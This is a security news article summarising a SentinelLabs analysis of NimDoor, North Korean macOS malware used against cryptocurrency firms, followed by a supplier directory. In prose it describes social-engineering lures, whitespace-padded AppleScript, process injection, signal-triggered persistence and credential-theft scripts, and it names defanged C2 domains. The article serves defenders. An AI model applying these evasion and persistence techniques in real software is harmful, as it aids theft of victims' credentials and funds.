NimDoor: North Korea’s Latest Cyber Exploit Targets Crypto

In April 2025, a wave of cyberattacks targeting Web3 and cryptocurrency businesses revealed a new weapon in the arsenal of North Korean threat actors: NimDoor, a macOS malware compiled in the Nim programming language.

Forensically dissected in this detailed report by researchers at SentinelOne's SentinelLabs, the campaign showcases the Democratic People’s Republic of Korea’s (DPRK) evolving tactics, blending social engineering, novel persistence mechanisms, and cross-platform coding to infiltrate high-value targets.

The use of Nim, a lesser-known computer language, alongside AppleScripts and encrypted WebSocket communications, marks a shift towards more complex and stealthy operations.

Social Engineering: A Familiar Opening

The attack begins with a tried-and-tested DPRK tactic: impersonating a trusted contact via Telegram to lure victims into scheduling a meeting through Calendly. Victims receive an email with a Zoom meeting link and instructions to run a fraudulent “Zoom SDK update script.” This script, hosted on attacker-controlled domains mimicking Zoom’s legitimate infrastructure (e.g., support.us05web-zoom[.]forum), is an AppleScript named *zoom_sdk_support.scpt*. Padded with 10,000 lines of whitespace to evade detection, it contains a typo—“Zook” instead of “Zoom”—revealing the attackers’ carelessness.

The script fetches a second-stage payload from a command-and-control (C2) server, initiating the infection chain.

NimDoor’s Technical Mastery

The campaign’s core innovation lies in its use of Nim-compiled binaries, a rarity in macOS malware. Two primary Mach-O binaries, *a* and *installer*, are dropped into /private/var/tmp. The *a* binary, written in C++, deploys an encrypted payload called *netchk*, which orchestrates data exfiltration. It uses a Password-Based Key Derivation Function 2 (PBKDF2) with the password “gift123$%^” to decrypt two embedded binaries: a benign *Target* binary and the malicious *trojan1_arm64*. The latter is injected into *Target* using a sophisticated process injection technique, enabled by specific macOS entitlements. This injected code communicates with a C2 server via TLS-encrypted WebSocket (wss), a method uncommon in macOS malware, employing multiple layers of RC4 encryption and JSON-formatted messages.

The *installer* binary, also Nim-compiled, sets up persistence by creating a LaunchAgent at ~/Library/LaunchAgents/com.google.update.plist. It deploys two additional Nim binaries: *GoogIe LLC* (with a deceptive capital “I” to mimic Google) and *CoreKitAgent*. These ensure long-term access, with *CoreKitAgent* using a state-driven kqueue mechanism and a novel persistence trick: it intercepts SIGINT and SIGTERM signals (triggered by user or system attempts to terminate the process) to redeploy its components, ensuring resilience against basic defensive measures.

 Data Theft With Precision

NimDoor’s data-stealing capabilities are executed via two Bash scripts, *upl* and *tlgrm*. The *upl* script targets browser data from Arc, Brave, Firefox, Chrome, and Edge, as well as Keychain credentials and shell history files. These are compressed and exfiltrated to a C2 server at dataupload[.]store. The *tlgrm* script focuses on Telegram, stealing its encrypted database and decryption key for potential offline cracking.

Both scripts use near-identical exfiltration functions, indicating a streamlined approach to data theft.

AppleScript As Beacon & Backdoor

A standout feature is the use of AppleScript as a lightweight beacon and backdoor. Embedded in *CoreKitAgent*, an AppleScript at ~/.ses decodes hexadecimal strings to fetch the current timestamp, generate a unique ID, and beacon every 30 seconds to C2 servers (writeup[.]live or safeup[.]store). It lists running processes and executes any commands received, blending seamlessly with macOS’s native scripting environment to avoid detection.

Why Nim?

The choice of Nim, a language known for its compile-time execution and cross-platform compatibility, reflects DPRK actors’ shift towards tools that complicate analysis. Unlike Go or Rust, previously used by North Korean groups, Nim’s ability to interweave developer and runtime code obscures control flow, challenging reverse engineers.

Combined with macOS-specific features like AppleScript and signal handling, NimDoor demonstrates a calculated effort to exploit less-scrutinised technologies.

 A Broader Campaign

SentinelLabs’ findings align with reports from Huntabil.IT and Huntress, which noted similar attack chains targeting Web3 firms. Parallel domains (e.g., support.us06web-zoom[.]online) suggest a broader campaign with tailored URLs for each victim. The infrastructure’s overlap with earlier DPRK operations, such as fake Zoom domains, ties NimDoor to established tactics while showcasing innovation in payload delivery and persistence.

Implications For Defenders

NimDoor’s complexity underscores the need for defenders to adapt to emerging languages and techniques. Its use of wss, process injection, and signal-based persistence highlights active development to bypass security measures.

SentinelLabs urges analysts to study Nim and similar languages, as their obscurity offers attackers an edge.

Indicators of compromise, including domains, file paths, and binary hashes, are provided to aid detection, but the campaign’s sophistication suggests DPRK actors will continue refining their skills, posing ongoing risks to high-value sectors like cryptocurrency.

Image: Ideogram

You Might Also Read: 

North Korean Hackers For Hire:


If you like this website and use the comprehensive 7,000-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible


 

« Securing Cyber-Physical Systems
Qantas Falls Victim As Scattered Spider Targets Aviation »

ManageEngine
CyberSecurity Jobsite
Check Point

Directory of Suppliers

XYPRO Technology

XYPRO Technology

XYPRO is the market leader in HPE Non-Stop Security, Risk Management and Compliance.

ZenGRC

ZenGRC

ZenGRC (formerly Reciprocity) is a leader in the GRC SaaS landscape, offering robust and intuitive products designed to make compliance straightforward and efficient.

Authentic8

Authentic8

Authentic8 transforms how organizations secure and control the use of the web with Silo, its patented cloud browser.

Clayden Law

Clayden Law

Clayden Law advise global businesses that buy and sell technology products and services. We are experts in information technology, data privacy and cybersecurity law.

Jooble

Jooble

Jooble is a job search aggregator operating in 71 countries worldwide. We simplify the job search process by displaying active job ads from major job boards and career sites across the internet.

Virtustream

Virtustream

The Virtustream Enterprise Class Cloud provides a secure, highly available, Infrastructure as a Service (IaaS) to enterprises and government customers.

Grimm Cyber

Grimm Cyber

GRIMM makes the world a more secure place by increasing the cyber resiliency of our client’s systems, networks, and products.

Secardeo

Secardeo

Secardeo is a provider of corporate solutions using digital signatures and certificates. Our solutions enable the user transparent end-to-end encryption of e-mails between organizations.

Lynx Technology Partners

Lynx Technology Partners

Lynx Technology Partners is a full service, full life-cycle risk-based security consulting firm.

Phew

Phew

Phew are New Zealand cyber security specialists with expertise and experience forged in global financial markets, IT&T, management consulting and SME business management.

NFIR

NFIR

NFIR is a specialist in the field of cyber security incident response and digital forensics.

National Centre for Cyber Security (NCCS) - Pakistan

National Centre for Cyber Security (NCCS) - Pakistan

National Centre for Cyber Security (NCCS) undertakes cyber security research and plays a leading role in securing Pakistan’s Cyberspace.

Swiss Accreditation Service (SAS)

Swiss Accreditation Service (SAS)

SAS is the national accreditation body for Switzerland. The directory of members provides details of organisations offering certification services for ISO 27001.

EUROCONTROL

EUROCONTROL

EUROCONTROL is a pan-European, civil-military organisation dedicated to supporting European aviation. We help our stakeholders protect themselves against cyber threats.

DisruptOps

DisruptOps

Built for today’s cloud-scale enterprises, DisruptOps’ Cloud Detection and Response platform automates assessment and remediation procedures of critical cloud security issues.

Orpheus Cyber

Orpheus Cyber

Orpheus Cyber provides predictive and actionable intelligence to our clients - enabling them to anticipate, prepare for and respond to the cyber threats they face.

Cyberplc

Cyberplc

Cyberplc is a global cybersecurity consulting firm providing services to government, the public sector and enterprises.

Millennium Corporation

Millennium Corporation

For nearly two decades, Millennium Corporation has been operating on the leading edge of cybersecurity.

CloudCoCo

CloudCoCo

CloudCoCo help UK businesses of all sizes and industries succeed by providing enterprise-grade technology at small-business prices.

Blue Networks & Infrastructure (BNI)

Blue Networks & Infrastructure (BNI)

Blue Networks and Infrastructure (BNI) is an innovative systems integrator and managed services provider.

Oktacron

Oktacron

Oktacron is a company specialized in cybersecurity, guided by the principle that at every moment, in every approach, and with all technologies, one should stay one step ahead of attackers.